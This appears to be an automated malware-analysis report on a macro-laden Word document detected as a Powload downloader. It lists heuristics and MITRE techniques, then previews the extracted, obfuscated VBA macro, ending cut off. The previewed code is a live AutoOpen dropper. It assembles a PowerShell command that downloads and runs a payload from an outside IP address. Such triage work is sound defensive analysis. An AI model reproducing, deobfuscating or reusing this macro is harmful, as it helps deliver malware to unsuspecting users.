Verdict: MALICIOUS
Risk Score: 244

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File

Malware Insights
The file contains a VBA macro with an AutoOpen function that calls Shell(). This indicates an attempt to execute arbitrary code, likely a PowerShell command, as suggested by the ClamAV detection name 'Doc.Downloader.Powload-7059209-0'. The macro's obfuscation and its use of Shell() strongly suggest it is designed to download and execute a secondary payload.
Heuristics (8)

- ClamAV: Doc.Downloader.Powload-7059209-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Powload-7059209-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: ce4ae9195eb5bb7964f022e921d05ea4154a5cb64735565751b4fa06c54a16c7) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 38404 bytes |

Detection for macros.bas:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 36 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "pnzahMHSO"
Function Roichtint()
kqFLuLtJ = Mid("7rWlumtFXqKWESaATCGi34N33", 15, 1) + GTVVwBJ + fNKIRYl
sqWLlCuZ = Mid("w9Jrpt9oaIjzQR7ArVMnb98c+98cre98c+98cak;'+'}ca98c+98ctch{writ98c+98ce-h98c+9'+'8cos98c'+'+98ct mUa_.E98c+98cxcep98c+98ct98c+98cion.Message;}}VVBlEZK6pH", 21, 121) + iKLYaZN + ipEjdDZ
jjviiX = Mid("0KZj69Wu0SQnQGrV4lakcW98'+'c+98cdb98c+98cHV98c+98c + mUak98c+98carapas + bH'+'bBT'+'+bBTV.e98c+98cx98c+98ce98c+98cbHV;98c+98c'+'bBT+bBTforeach(98c+98cm98c+98cUa98c+98clqKGKMSw9kz2n8", 21, 147) + NkAHjiz + wtwMZjS
mqAtHkIAj = Mid("9cibjII4sA25DniiSR9'+'8'+'c+98cebC98c+98client;mUan98c+98csabB'+'T+bBT98c+98cdasd98c+98c = ne98c+98cw-obje98c+98cc'+'t98c+98c r98c+98candom;98c+98cm98c+98cUab98c+98ccd = bBT+bBTbHVh98c+98ct98c+98ctp98cl76V1V", 19, 183) + EaUzJbU + jWXuwMk
fQADdzcirb = Mid("bPMIrp3Pjlwu7epLACe ([CHAR]98+[CHAR]66+[CHAR]84),[CHAR]39)|INVoKe-ExPResS3TjGwaZY", 14, 61) + fsnCJoX + rZXqiLf
BwTXz = Mid("u0dSrZuCc0CKA3oUmq3rBm1wapqt6Invok98c+98ce-'+'I98c+98ctem(mUah98c+98'+'cua98c+98cs98c+98c);WNp", 30, 62) + wftRiri + HuCwHBb
QDMFWDWiz = Mid("MORJiS7AZB0a5),[CHAR]36 -cR2Dul1mzifKHXWmrAStwI", 13, 15) + PABFzdr + zQjnqbS
WkRWwWV = Mid("qq9as98c+98c = mUaenv:pub98c+98clic + 98c+98cbbBT+'+'bBTHVM98c+98joIsUa7DXzvBpGs", 4, 62) + SbovniC + uCEzQjL
vYSwbU = Mid("qmvX2SsmttK8jqXLSQ1Vsrbc i98c+98cbBT+bBT'+'n mU9'+'8c+98cab98c+98ccd)bBT'+'+bBT{tr9'+'8c+98cy{mUafr'+'ancbBT+bBT98c+9'+'8c.Do98c+98cwn98c+98clo'+'adFil'+'bBT+bBTe(mU98c+'+'98caabc.ToString(),'+' mUah'+'uas);98c+98cuOI5zwrSdkchk5hd", 23, 192) + ZuYIuwF + zuooaDt
tMKBr = Mid("n2wVpBTc+98crapas = 98c+98cm98c+98cUans98c+98cadasd.next(bBT+bBT198c+98c, 349bBT+bBT8c+98c'+'324598c+98c);mUahubBT+bBTMYfbvOYh9qBs8Ow8hpziR0S1Ert", 6, 113) + NEZsscJ + ZHpMjzB
YBoQLVnC = Mid("ACVzdIQSU8YpMYrS1k+98cka98bBT+bXpwCwzCV37kolzOXiYdlT", 19, 13) + uhkhOhk + OiLQlcc
tXbwBcdGUs = Mid("PioN4inGnbJTBLiDK18TniVzOLQrPSWkWaiDrmS", 2, 3) + kroBiNH + bwkTqVL
JIQLiYw = Mid("wrDmVM98c)-cREPlAce 98cMWd98c,[Cha'+'rbBT+bBT]92-R'+'ePLAce([Char]109+[bB'+'T+bBTCharbBT'+'+bBhB0jBMGBzRaIYcsnmE5ajAjQH", 7, 89) + SdQNuzT + ckuPDLX
cHOzr = Mid("PDH4XPcR99uQkcsbRcQa0MKNo(('& ( XFUpsHoME[4]+XFUpShoMe[30]+bBTxbBT)( (bBT&( xh6ShElLId['+'1]+xh6sHEllID[13]+98cX98c) (((98cmUafrabBT+bBT98c+98cnc =9'+'8c+98c n98bBT+'+'bBTc+98cew-object98c+98cbBT+bBT System.Net'+'98c+98c.WwV", 26, 197) + FnmwujH + CcaNJRm
JnUkQt = Mid("GRzXo22Diuj9CKG+98c://98c+98c89.298c+98c498c+98c8.169.1'+'398c+'+'98c6/98c+98cbi98c+98cgmac98c+98c.j98c+98'+'cpgbH9'+'8c+98cV98c'+'+98c.S98c+98cplit(98c+98cbHV,b98c+98cHV)98c+98c;m98c+bBT+bBT98cU98c+98ca98cuTuq0WdZJCZ72jrVJI6r8JG", 16, 191) + MrzatfH + cFRrJMs
AhwYwRT = Mid("wD8dT]85+[Char]97),[C'+'har]36 -cbBT+bBTREPlAce 98cbHbB'+'T+'+'bBTV98c,[Char]39))bBT).RePlACE(bBTxh6bBT,bBTXFUbBT).RePlACE(bBT98cbBT,[String][chAR]39) ) ') -REpLAce([CHAR]88+[CHAR]70+[CHAR]8drFTfM", 5, 188) + kXGrhQj + QjXGVcM
Roichtint = nzLluuPPa + QnSimfupD + Chr(34) + cHOzr + mqAtHkIAj + JnUkQt + YBoQLVnC + tMKBr + WkRWwWV + jjviiX + kqFLuLtJ + vYSwbU + BwTXz + sqWLlCuZ + JIQLiYw + AhwYwRT + QDMFWDWiz + fQADdzcirb + tXbwBcdGUs
End Function
Attribute VB_Name = "pPbYLZuMw"
Sub AutoOpen()
hcRjmQVrP
End Sub
Function QnSimfupD()
XjiiU = Mid("zD!!%hcRjmQVrP%rMmEwaf0Y", 3, 13) + FTJMYwP + TKhcjoc
REvJJ = Mid("KniRoichtGS52Kw8QqMcw831", 4, 6) + ctdEEHi + vzuJmdw
ntHDccj = Mid("NmK851HJw8vCwM8YczjNVw%=p^ouBzis", 21, 7) + NJAVphn + zbkVBhi
LVbUrVTbz = Mid("uNSspDNRomqLz%=cKh6D5v 0i0", 2, 14) + uaZLall + JRnQZAa
kFItXGRq = Mid("4s6KT0FzaYnA2iKuYCdonY0KVhel^l&&s6PYYHc", 26, 8) + qdAZRhJ + vqGwNBi
XJiAz = Mid("nJXpfBwG5DHNlFIet %YZHDwpTiQZiGSjK", 16, 7) + iuUEYaK + PzittQX
KJzDZjpsjp = Mid("M5si4nFKhLwIUuEQQj&&set %5Bjl", 17, 9) + tWwOdLM + bIdHztN
QDLDmkuNnE = Mid("5iset %HOAaDplpzCvPB5WYM58m", 3,
... (truncated)